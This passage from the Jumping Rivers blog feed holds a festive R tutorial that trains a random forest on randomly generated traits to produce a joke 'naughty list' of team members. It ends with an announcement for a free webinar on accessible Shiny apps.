&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyverse)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(randomForest)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggplot2)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing we need to do is set up a vector containing the team
members along with some Christmas temp workers Santa’s Intern Elf,
Rudolph the Data Reindeer and Frosty the Snow Analyst.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Team members&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;team &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Esther Gillespie&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Colin Gillespie&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sebastian Mellor&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Martin Smith&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Richard Brown&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Shane Halloran&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Mitchell Oliver&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Keith Newman&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Russ Hyde&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Gigi Kenneth&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Pedro Silva&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Carolyn Wilson&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Myles Mitchell&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo Roe&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Tim Brock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Osheen MacOscar&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Emily Wales&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Amieroh Abrahams&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Deborah Washington&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Susan Smith&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Santa&amp;#39;s Intern Elf&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Rudolph the Data Reindeer&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Frosty the Snow Analyst&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we have the team members we will &lt;strong&gt;randomly&lt;/strong&gt; generate some values
for the model features.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Randomly generate playful &amp;#39;naughty traits&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set.seed&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;51&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; team,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ate_too_many_cookies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; forgot_to_send_cards &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sang_off_key &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wrapping_disaster &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; naughty &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sample&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(team), replace &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Encode names as numeric&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name_encoded &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;factor&lt;/span&gt;(df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next on the list is to set up a vector of features we want to use, and
then train the model. We can then use the model to predict our
fictitious naughtiness score for each team member! We can see Theo is at
the top of the list, closely followed by Osheen.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;features &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;name_encoded&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ate_too_many_cookies&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forgot_to_send_cards&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sang_off_key&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;wrapping_disaster&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Train Random Forest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rf_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;randomForest&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[, features],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.factor&lt;/span&gt;(df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;naughty),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ntree &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Predict naughtiness&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;predicted_naughty &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(rf_model, df[, features])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;naughtiness_score &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;predict&lt;/span&gt;(rf_model, df[, features],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;prob&amp;#34;&lt;/span&gt;)[, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create the Naughty List&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;naughty_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(naughtiness_score)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(name, naughtiness_score, predicted_naughty)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(naughty_list)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## # A tibble: 23 × 3
## name naughtiness_score predicted_naughty
## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;fct&amp;gt;
## 1 Theo Roe 0.76 1
## 2 Osheen MacOscar 0.74 1
## 3 Myles Mitchell 0.72 1
## 4 Esther Gillespie 0.68 1
## 5 Deborah Washington 0.66 1
## 6 Tim Brock 0.59 1
## 7 Amieroh Abrahams 0.55 1
## 8 Santa's Intern Elf 0.48 0
## 9 Carolyn Wilson 0.38 0
## 10 Susan Smith 0.2 0
## # ℹ 13 more rows
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The last thing to do is visualise our results with
&lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;{ggplot2}&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Fun bar plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(naughty_list,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reorder&lt;/span&gt;(name, naughtiness_score),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; naughtiness_score,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.factor&lt;/span&gt;(predicted_naughty))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;coord_flip&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;forestgreen&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;1&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;darkred&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Nice&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Naughty&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;🎅 Jumping Rivers ML-powered Naughty List 🎄&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Team Member&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Naughtiness Score&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Status&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers Naughty List&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;(base_family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;outfit&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/featured.png" alt="Ggplot2 column chart showing Jumping Rivers Naughty List" width="672" /&gt;
&lt;h2 id="step-4-analysis-and-notes"&gt;Step 4: Analysis and Notes&lt;/h2&gt;
&lt;p&gt;After generating predictions, we can interpret the Naughty List. The
highest naughtiness scores indicate which participants are most
mischievous according to our playful model.&lt;/p&gt;
&lt;p&gt;Observations from this analysis include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cookie Enthusiasts: Participants with multiple cookie infractions
scored higher.&lt;/li&gt;
&lt;li&gt;Gift Wrapping Chaos: Those whose presents looked like abstract art
contributed to higher scores.&lt;/li&gt;
&lt;li&gt;Musical Mishaps: Off-key carolers were highlighted as naughty.&lt;/li&gt;
&lt;li&gt;Forgotten Cards: Small lapses in festive correspondence nudged some up
the naughty rankings.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Special mentions:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Theo unsurprisingly tops the naughty list.&lt;/li&gt;
&lt;li&gt;Santa’s Intern Elf performed well, staying mostly nice.&lt;/li&gt;
&lt;li&gt;Shane had the best score and I’m sure Santa will be very nice to him
this year!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This analysis provides both a technical demonstration of ML workflow and
a fun story that engages readers during the festive season.&lt;/p&gt;
&lt;h2 id="step-5-conclusion"&gt;Step 5: Conclusion&lt;/h2&gt;
&lt;p&gt;This project demonstrates how machine learning can be used in creative
ways outside of traditional business use cases. By combining features
with a proper ML workflow, we created a light-hearted, festive story
suitable for a blog, while also reinforcing good practices in data
collection, preprocessing, modeling, and visualization.&lt;/p&gt;
&lt;p&gt;Ultimately, the Jumping Rivers ML-Powered Naughty List is a celebration
of data science, team culture, and holiday fun. Whether you’re naughty
or nice, we hope this inspires creative applications of ML in festive
contexts.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Make Your Shiny Apps Accessible to Everyone – Free Jumping Rivers Webinar!</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/</link><pubDate>Mon, 08 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Date &amp;amp; Time (BST): 11 December 2025, 13:00
Topic: Accessible Shiny: Designing for All Users&lt;/p&gt;
&lt;p&gt;Are you ready to make your Shiny applications more inclusive, user-friendly, and professional?
Join Jumping Rivers for our free monthly webinar series, designed for data professionals at all levels.
In just &lt;strong&gt;55 minutes&lt;/strong&gt;, you’ll learn how to create Shiny apps that are &lt;strong&gt;accessible to all users&lt;/strong&gt;,
meet modern accessibility standards, and provide a seamless experience for everyone – all from the comfort of your own desk.&lt;/p&gt;
&lt;h3 id="why-attend"&gt;Why Attend?&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Learn practical accessibility techniques&lt;/strong&gt; to make your Shiny apps usable for everyone.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhance your professional skills&lt;/strong&gt; and make your dashboards more inclusive and impactful.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Connect with a network&lt;/strong&gt; of data scientists, analysts, and developers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Learn flexibly online&lt;/strong&gt; with no cost.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="unlock-exclusive-benefits"&gt;Unlock Exclusive Benefits&lt;/h3&gt;
&lt;p&gt;Attend &lt;strong&gt;2 webinars&lt;/strong&gt; → 20% off tickets to the AI in Production conference.
Attend &lt;strong&gt;more than 2 webinars&lt;/strong&gt; → 20% off any of our high-quality public training courses.&lt;/p&gt;
&lt;p&gt;Whether you’re looking to improve your Shiny skills or make your data applications accessible to all users,
this webinar is your chance to &lt;strong&gt;level up your expertise and stand out in 2026&lt;/strong&gt;.&lt;/p&gt;
&lt;h3 id="ready-to-join"&gt;Ready to Join?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Register now to secure your spot and start creating Shiny apps everyone can use!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-shiny-accessibility/"&gt;original post&lt;/a&gt;
